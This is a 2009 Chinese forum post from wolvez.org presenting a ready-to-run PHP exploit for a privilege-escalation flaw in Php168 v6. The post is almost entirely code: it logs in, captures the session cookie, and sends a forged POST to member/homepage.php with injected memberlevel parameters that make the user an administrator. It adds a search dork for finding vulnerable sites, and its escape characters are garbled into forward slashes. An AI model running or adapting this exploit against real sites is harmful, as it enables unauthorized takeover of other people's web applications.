Php168 v6 权限提升漏洞 's

by Ryat
http://www.wolvez.org
2009-07-17

天天上班,好久没在论坛发贴了…

以前发过一个php168 v2008的权限提升漏洞,这次的漏洞也出在相同的代码段
直接给出exp,里面的一些细节还是有些意思的,有兴趣的同学可以自行分析:)

EXP:

#!/usr/bin/php <?php  print_r(' +---------------------------------------------------------------------------+ Php168 v6.0 update user access exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PHP168 V6.0" +---------------------------------------------------------------------------+ '); /**  * works regardless of php.ini settings  */ if ($argc < 5) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user pass host:      target server (ip/hostname) path:      path to php168 user:      login username pass:      login password Example: php '.$argv[0].' localhost /php168/ ryat 123456 +---------------------------------------------------------------------------+ ');     exit; }  error_reporting(7); ini_set('max_execution_time', 0);  $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4];  $resp = send(); preg_match('/Set-Cookie:/s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);  if ($cookie)     if (strpos(send(), 'puret_t') !== false)         exit("Expoilt Success!/nYou Are Admin Now!/n");     else         exit("Exploit Failed!/n"); else     exit("Exploit Failed!/n");  function rands($length = 8) {     $hash = '';     $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';     $max = strlen($chars) - 1;     mt_srand((double)microtime() * 1000000);     for ($i = 0; $i < $length; $i++)         $hash .= $chars[mt_rand(0, $max)];      return $hash; }  function send() {     global $host, $path, $user, $pass, $cookie;      if ($cookie) {         $cookie[1] .= ';USR='.rands()."/t31/t/t";         $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';          $message = "POST ".$path."member/homepage.php?uid=$cookie[2]  HTTP/1.1/r/n";         $message .= "Accept: */*/r/n";         $message .= "Accept-Language: zh-cn/r/n";         $message .= "Content-Type: application/x-www-form-urlencoded/r/n";         $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";         $message .= "Host: $host/r/n";         $message .= "Content-Length: ".strlen($cmd)."/r/n";         $message .= "Connection: Close/r/n";         $message .= "Cookie: ".$cookie[1]."/r/n/r/n";         $message .= $cmd;     } else {         $cmd = "username=$user&password=$pass&step=2";          $message = "POST ".$path."do/login.php  HTTP/1.1/r/n";         $message .= "Accept: */*/r/n";         $message .= "Accept-Language: zh-cn/r/n";         $message .= "Content-Type: application/x-www-form-urlencoded/r/n";         $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";         $message .= "Host: $host/r/n";         $message .= "Content-Length: ".strlen($cmd)."/r/n";         $message .= "Connection: Close/r/n/r/n";         $message .= $cmd;     }      $fp = fsockopen($host, 80);     fputs($fp, $message);      $resp = '';      while ($fp && !feof($fp))         $resp .= fread($fp, 1024);      return $resp; }  ?>